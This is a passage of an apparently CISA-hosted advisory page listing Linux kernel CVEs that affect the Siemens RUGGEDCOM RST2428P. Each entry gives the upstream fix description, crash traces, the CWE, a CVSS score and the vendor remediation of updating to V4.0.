(net/core/rtnetlink.c:6861) [ 0.911894] netlink_rcv_skb (net/netlink/af_netlink.c:2550) [ 0.912100] netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344) [ 0.912296] ? __alloc_skb (net/core/skbuff.c:706) [ 0.912484] netlink_sendmsg (net/netlink/af ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-22976">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-22977</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: sock: fix hardened usercopy panic in sock_recv_errqueue skbuff_fclone_cache was created without defining a usercopy region, [1] unlike skbuff_head_cache which properly whitelists the cb[] field. [2] This causes a usercopy BUG() when CONFIG_HARDENED_USERCOPY is enabled and the kernel attempts to copy sk_buff.cb data to userspace via sock_recv_errqueue() -&gt; put_cmsg(). The crash occurs when: 1. TCP allocates an skb using alloc_skb_fclone() (from skbuff_fclone_cache) [1] 2. The skb is cloned via skb_clone() using the pre-allocated fclone [3] 3. The cloned skb is queued to sk_error_queue for timestamp reporting 4. Userspace reads the error queue via recvmsg(MSG_ERRQUEUE) 5. sock_recv_errqueue() calls put_cmsg() to copy serr-&gt;ee from skb-&gt;cb [4] 6. __check_heap_object() fails because skbuff_fclone_cache has no usercopy whitelist [5] When cloned skbs allocated from skbuff_fclone_cache are used in the socket error queue, accessing the sock_exterr_skb structure in skb-&gt;cb via put_cmsg() triggers a usercopy hardening violation: [ 5.379589] usercopy: Kernel memory exposure attempt detected from SLUB object 'skbuff_fclone_cache' (offset 296, size 16)! [ 5.382796] kernel BUG at mm/usercopy.c:102! [ 5.383923] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI [ 5.384903] CPU: 1 UID: 0 PID: 138 Comm: poc_put_cmsg Not tainted 6.12.57 #7 [ 5.384903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 [ 5.384903] RIP: 0010:usercopy_abort+0x6c/0x80 [ 5.384903] Code: 1a 86 51 48 c7 c2 40 15 1a 86 41 52 48 c7 c7 c0 15 1a 86 48 0f 45 d6 48 c7 c6 80 15 1a 86 48 89 c1 49 0f 45 f3 e8 84 27 88 ff &lt;0f&gt; 0b 490 [ 5.384903] RSP: 0018:ffffc900006f77a8 EFLAGS: 00010246 [ 5.384903] RAX: 000000000000006f RBX: ffff88800f0ad2a8 RCX: 1ffffffff0f72e74 [ 5.384903] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffff87b973a0 [ 5.384903] RBP: 0000000000000010 R08: 0000000000000000 R09: fffffbfff0f72e74 [ 5.384903] R10: 0000000000000003 R11: 79706f6372657375 R12: 0000000000000001 [ 5.384903] R13: ffff88800f0ad2b8 R14: ffffea00003c2b40 R15: ffffea00003c2b00 [ 5.384903] FS: 0000000011bc4380(0000) GS:ffff8880bf100000(0000) knlGS:0000000000000000 [ 5.384903] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 5.384903] CR2: 000056aa3b8e5fe4 CR3: 000000000ea26004 CR4: 0000000000770ef0 [ 5.384903] PKRU: 55555554 [ 5.384903] Call Trace: [ 5.384903] [ 5.384903] __check_heap_object+0x9a/0xd0 [ 5.384903] __check_object_size+0x46c/0x690 [ 5.384903] put_cmsg+0x129/0x5e0 [ 5.384903] sock_recv_errqueue+0x22f/0x380 [ 5.384903] tls_sw_recvmsg+0x7ed/0x1960 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 [ 5.384903] ? schedule+0x6d/0x270 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 [ 5.384903] ? mutex_unlock+0x81/0xd0 [ 5.384903] ? __pfx_mutex_unlock+0x10/0x10 [ 5.384903] ? __pfx_tls_sw_recvmsg+0x10/0x10 [ 5.384903] ? _raw_spin_lock_irqsave+0x8f/0xf0 [ 5.384903] ? _raw_read_unlock_irqrestore+0x20/0x40 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 The crash offset 296 corresponds to skb2-&gt;cb within skbuff_fclones: - sizeof(struct sk_buff) = 232 - offsetof(struct sk_buff, cb) = 40 - offset of skb2.cb in fclones = 232 + 40 = 272 - crash offset 296 = 272 + 24 (inside sock_exterr_skb.ee) This patch uses a local stack variable as a bounce buffer to avoid the hardened usercopy check failure. [1] https://elixir.bootlin.com/linux/v6.12.62/source/net/ipv4/tcp.c#L885 [2] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5104 [3] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5566 [4] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5491 [5] https://elixir.bootlin.com/linux/v6.12.62/source/mm/slub.c#L5719</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-22977">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/489.html">CWE-489 Active Debug Code</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23025</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mm/page_alloc: prevent pcp corruption with SMP=n The kernel test robot has reported: BUG: spinlock trylock failure on UP on CPU#0, kcompactd0/28 lock: 0xffff888807e35ef0, .magic: dead4ead, .owner: kcompactd0/28, .owner_cpu: 0 CPU: 0 UID: 0 PID: 28 Comm: kcompactd0 Not tainted 6.18.0-rc5-00127-ga06157804399 #1 PREEMPT 8cc09ef94dcec767faa911515ce9e609c45db470 Call Trace: __dump_stack (lib/dump_stack.c:95) dump_stack_lvl (lib/dump_stack.c:123) dump_stack (lib/dump_stack.c:130) spin_dump (kernel/locking/spinlock_debug.c:71) do_raw_spin_trylock (kernel/locking/spinlock_debug.c:?) _raw_spin_trylock (include/linux/spinlock_api_smp.h:89 kernel/locking/spinlock.c:138) __free_frozen_pages (mm/page_alloc.c:2973) ___free_pages (mm/page_alloc.c:5295) __free_pages (mm/page_alloc.c:5334) tlb_remove_table_rcu (include/linux/mm.h:? include/linux/mm.h:3122 include/asm-generic/tlb.h:220 mm/mmu_gather.c:227 mm/mmu_gather.c:290) ? __cfi_tlb_remove_table_rcu (mm/mmu_gather.c:289) ? rcu_core (kernel/rcu/tree.c:?) rcu_core (include/linux/rcupdate.h:341 kernel/rcu/tree.c:2607 kernel/rcu/tree.c:2861) rcu_core_si (kernel/rcu/tree.c:2879) handle_softirqs (arch/x86/include/asm/jump_label.h:36 include/trace/events/irq.h:142 kernel/softirq.c:623) __irq_exit_rcu (arch/x86/include/asm/jump_label.h:36 kernel/softirq.c:725) irq_exit_rcu (kernel/softirq.c:741) sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1052) RIP: 0010:_raw_spin_unlock_irqrestore (arch/x86/include/asm/preempt.h:95 include/linux/spinlock_api_smp.h:152 kernel/locking/spinlock.c:194) free_pcppages_bulk (mm/page_alloc.c:1494) drain_pages_zone (include/linux/spinlock.h:391 mm/page_alloc.c:2632) __drain_all_pages (mm/page_alloc.c:2731) drain_all_pages (mm/page_alloc.c:2747) kcompactd (mm/compaction.c:3115) kthread (kernel/kthread.c:465) ? __cfi_kcompactd (mm/compaction.c:3166) ? __cfi_kthread (kernel/kthread.c:412) ret_from_fork (arch/x86/kernel/process.c:164) ? __cfi_kthread (kernel/kthread.c:412) ret_from_fork_asm (arch/x86/entry/entry_64.S:255) Matthew has analyzed the report and identified that in drain_page_zone() we are in a section protected by spin_lock(&amp;pcp-&gt;lock) and then get an interrupt that attempts spin_trylock() on the same lock. The code is designed to work this way without disabling IRQs and occasionally fail the trylock with a fallback. However, the SMP=n spinlock implementation assumes spin_trylock() will always succeed, and thus it's normally a no-op. Here the enabled lock debugging catches the problem, but otherwise it could cause a corruption of the pcp structure. The problem has been introduced by commit 574907741599 ("mm/page_alloc: leave IRQs enabled for per-cpu page allocations"). The pcp locking scheme recognizes the need for disabling IRQs to prevent nesting spin_trylock() sections on SMP=n, but the need to prevent the nesting in spin_lock() has not been recognized. Fix it by introducing local wrappers that change the spin_lock() to spin_lock_iqsave() with SMP=n and use them in all places that do spin_lock(&amp;pcp-&gt;lock). [vbabka@suse.cz: add pcp_ prefix to the spin_lock_irqsave wrappers, per Steven]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23025">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23026</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: qcom: gpi: Fix memory leak in gpi_peripheral_config() Fix a memory leak in gpi_peripheral_config() where the original memory pointed to by gchan-&gt;config could be lost if krealloc() fails. The issue occurs when: 1. gchan-&gt;config points to previously allocated memory 2. krealloc() fails and returns NULL 3. The function directly assigns NULL to gchan-&gt;config, losing the reference to the original memory 4. The original memory becomes unreachable and cannot be freed Fix this by using a temporary variable to hold the krealloc() result and only updating gchan-&gt;config when the allocation succeeds. Found via static analysis and code review.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23026">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23030</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: phy: rockchip: inno-usb2: Fix a double free bug in rockchip_usb2phy_probe() The for_each_available_child_of_node() calls of_node_put() to release child_np in each success loop. After breaking from the loop with the child_np has been released, the code will jump to the put_child label and will call the of_node_put() again if the devm_request_threaded_irq() fails. These cause a double free bug. Fix by returning directly to avoid the duplicate of_node_put().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23030">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23031</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: can: gs_usb: gs_usb_receive_bulk_callback(): fix URB memory leak In gs_can_open(), the URBs for USB-in transfers are allocated, added to the parent-&gt;rx_submitted anchor and submitted. In the complete callback gs_usb_receive_bulk_callback(), the URB is processed and resubmitted. In gs_can_close() the URBs are freed by calling usb_kill_anchored_urbs(parent-&gt;rx_submitted). However, this does not take into account that the USB framework unanchors the URB before the complete function is called. This means that once an in-URB has been completed, it is no longer anchored and is ultimately not released in gs_can_close(). Fix the memory leak by anchoring the URB in the gs_usb_receive_bulk_callback() to the parent-&gt;rx_submitted anchor.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23031">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23032</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: null_blk: fix kmemleak by releasing references to fault configfs items When CONFIG_BLK_DEV_NULL_BLK_FAULT_INJECTION is enabled, the null-blk driver sets up fault injection support by creating the timeout_inject, requeue_inject, and init_hctx_fault_inject configfs items as children of the top-level nullbX configfs group. However, when the nullbX device is removed, the references taken to these fault-config configfs items are not released. As a result, kmemleak reports a memory leak, for example: unreferenced object 0xc00000021ff25c40 (size 32): comm "mkdir", pid 10665, jiffies 4322121578 hex dump (first 32 bytes): 69 6e 69 74 5f 68 63 74 78 5f 66 61 75 6c 74 5f init_hctx_fault_ 69 6e 6a 65 63 74 00 88 00 00 00 00 00 00 00 00 inject.......... backtrace (crc 1a018c86): __kmalloc_node_track_caller_noprof+0x494/0xbd8 kvasprintf+0x74/0xf4 config_item_set_name+0xf0/0x104 config_group_init_type_name+0x48/0xfc fault_config_init+0x48/0xf0 0xc0080000180559e4 configfs_mkdir+0x304/0x814 vfs_mkdir+0x49c/0x604 do_mkdirat+0x314/0x3d0 sys_mkdir+0xa0/0xd8 system_call_exception+0x1b0/0x4f0 system_call_vectored_common+0x15c/0x2ec Fix this by explicitly releasing the references to the fault-config configfs items when dropping the reference to the top-level nullbX configfs group.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23032">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23033</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: omap-dma: fix dma_pool resource leak in error paths The dma_pool created by dma_pool_create() is not destroyed when dma_async_device_register() or of_dma_controller_register() fails, causing a resource leak in the probe error paths. Add dma_pool_destroy() in both error paths to properly release the allocated dma_pool resource.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23033">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23037</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: can: etas_es58x: allow partial RX URB allocation to succeed When es58x_alloc_rx_urbs() fails to allocate the requested number of URBs but succeeds in allocating some, it returns an error code. This causes es58x_open() to return early, skipping the cleanup label 'free_urbs', which leads to the anchored URBs being leaked. As pointed out by maintainer Vincent Mailhol, the driver is designed to handle partial URB allocation gracefully. Therefore, partial allocation should not be treated as a fatal error. Modify es58x_alloc_rx_urbs() to return 0 if at least one URB has been allocated, restoring the intended behavior and preventing the leak in es58x_open().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23037">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23038</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: pnfs/flexfiles: Fix memory leak in nfs4_ff_alloc_deviceid_node() In nfs4_ff_alloc_deviceid_node(), if the allocation for ds_versions fails, the function jumps to the out_scratch label without freeing the already allocated dsaddrs list, leading to a memory leak. Fix this by jumping to the out_err_drain_dsaddrs label, which properly frees the dsaddrs list before cleaning up other resources.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23038">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23111</a></h3>
<div class="csaf-accordion-content">
